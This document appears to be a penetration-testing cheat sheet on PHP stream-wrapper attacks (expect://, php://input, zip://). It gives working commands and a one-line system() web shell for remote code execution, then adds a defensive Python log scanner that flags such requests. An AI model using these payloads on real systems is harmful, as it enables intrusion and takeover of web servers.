PHP Wrappers
http://osbornepro.com/index.php?language=expect://id
echo '<?php system($_GET["cmd"]); ?>' | base64
# Place above result into URI below
curl -s -X POST --data "<?php system('id'); ?>" "http://osbornepro.com/index.php?language=php://input" | grep uid
sudo apt install phpX.Y-zip # Install tool
echo '<?php system($_GET["cmd"]); ?>' > exec.php # Create payload
zip malicious.zip exec.php # Create the zip file
rm exec.php # Clean up now unneeded file
Next, copy malicious.zip to the webroot directory to simulate the upload. Files inside the zip archive are referenced using the # symbol, which must be URL-encoded as %23 in the request. For example, the URL
http://osbornepro.com/index.php?language=zip://malicious.zip%23exec.php&cmd=id
can be used to include exec.php and then execute code using the cmd parameter.
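From the defender's side, every request above carries a stream-wrapper scheme at the start of the language parameter, which shows up in web access logs. The following Python sketch is an added example, not part of the original page: it flags such parameters in combined-format log lines. The log lines are constructed, and data:// and phar:// are included as an assumption beyond the wrappers listed here.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Schemes used on this page (expect, php, zip) plus data and phar,
# which are added here as an assumption about what else to watch for.
WRAPPER_RE = re.compile(r"^\s*(expect|php|zip|data|phar)://", re.IGNORECASE)
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=expect://id HTTP/1.1" 200 540',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "POST /index.php?language=php://input HTTP/1.1" 200 540',
    '203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /index.php?language=zip://malicious.zip%23exec.php&cmd=id HTTP/1.1" 200 540',
    '203.0.113.8 - - [01/Jan/2024:10:00:20 +0000] "GET /go.php?next=https://example.com/ HTTP/1.1" 302 0',
]


def find_wrapper_params(log_line):
    """Return [(param, scheme)] for query values that begin with a stream wrapper."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(2)).query
    hits = []
    # parse_qsl percent-decodes once, which is the value PHP itself receives.
    for name, value in parse_qsl(query, keep_blank_values=True):
        found = WRAPPER_RE.match(value)
        if found:
            hits.append((name, found.group(1).lower()))
    return hits


def scan(lines):
    """Return [(line_number, param, scheme)] for every flagged parameter."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for name, scheme in find_wrapper_params(line):
            findings.append((number, name, scheme))
    return findings


if __name__ == "__main__":
    for number, name, scheme in scan(SAMPLE_LOG):
        print(f"line {number}: parameter {name!r} uses {scheme}:// wrapper")
```

With php://input the payload travels in the POST body, so a standard access log only shows the wrapper in the query string, not the submitted code.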